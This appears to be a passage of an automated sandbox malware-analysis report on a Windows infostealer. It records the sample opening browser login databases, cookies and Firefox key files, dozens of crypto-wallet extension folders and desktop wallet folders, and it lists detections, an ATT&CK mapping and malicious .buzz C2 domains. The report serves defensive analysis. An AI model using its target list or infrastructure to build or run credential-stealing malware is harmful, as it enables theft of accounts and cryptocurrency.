                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: IERiUft8Wi.exe, 00000000.00000003.1450284221.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450409712.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499314192.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: IERiUft8Wi.exe PID: 788, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
                Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
                Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: IERiUft8Wi.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: IERiUft8Wi.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
                Source: IERiUft8Wi.exe, 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: IERiUft8Wi.exe, 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\IERiUft8Wi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: Yara match; File source: 00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: IERiUft8Wi.exe PID: 788, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match; File source: Process Memory Space: IERiUft8Wi.exe PID: 788, type: MEMORYSTR
                Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
                MITRE ATT&CK Matrix (the number in parentheses is the signature-count badge the report shows next to a technique):

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: Windows Management Instrumentation (12); PowerShell (1); At; Cron; Launchd; Scheduled Task
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: Virtualization/Sandbox Evasion (44); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: Query Registry (1); Security Software Discovery (851); Virtualization/Sandbox Evasion (44); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: Data from Local System (31); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
                Source | Detection | Scanner | Label
                IERiUft8Wi.exe | 55% | Virustotal | -
                IERiUft8Wi.exe | 58% | ReversingLabs | Win32.Trojan.Symmi
                IERiUft8Wi.exe | 100% | Avira | TR/Crypt.XPACK.Gen
                IERiUft8Wi.exe | 100% | Joe Sandbox ML | -
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://mindhandru.buzz/al | 100% | Avira URL Cloud | malware
                https://mindhandru.buzz/apieed | 100% | Avira URL Cloud | malware
                https://mindhandru.buzz/_AP | 100% | Avira URL Cloud | malware
                https://mindhandru.buzz/te | 100% | Avira URL Cloud | malware
                https://mindhandru.buzz/apiz | 100% | Avira URL Cloud | malware
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                mindhandru.buzz | 104.21.11.101 | true | false | - | high

                Name | Malicious | Antivirus Detection | Reputation
                scentniej.buzz | false | - | high
                rebuildeso.buzz | false | - | high
                appliacnesot.buzz | false | - | high
                screwamusresz.buzz | false | - | high
                cashfuzysao.buzz | false | - | high
                inherineau.buzz | false | - | high
                prisonyfork.buzz | false | - | high
                hummskitnj.buzz | false | - | high
                mindhandru.buzz | false | - | high
                https://mindhandru.buzz/api | false | - | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0 | IERiUft8Wi.exe (process memory) | false | - | high
                https://duckduckgo.com/chrome_newtab | IERiUft8Wi.exe (process memory) | false | - | high
                https://mindhandru.buzz/al | IERiUft8Wi.exe (process memory) | false | Avira URL Cloud: malware | unknown
                https://mindhandru.buzz/apieed | IERiUft8Wi.exe (process memory) | false | Avira URL Cloud: malware | unknown
                https://duckduckgo.com/ac/?q= | IERiUft8Wi.exe (process memory) | false | - | high
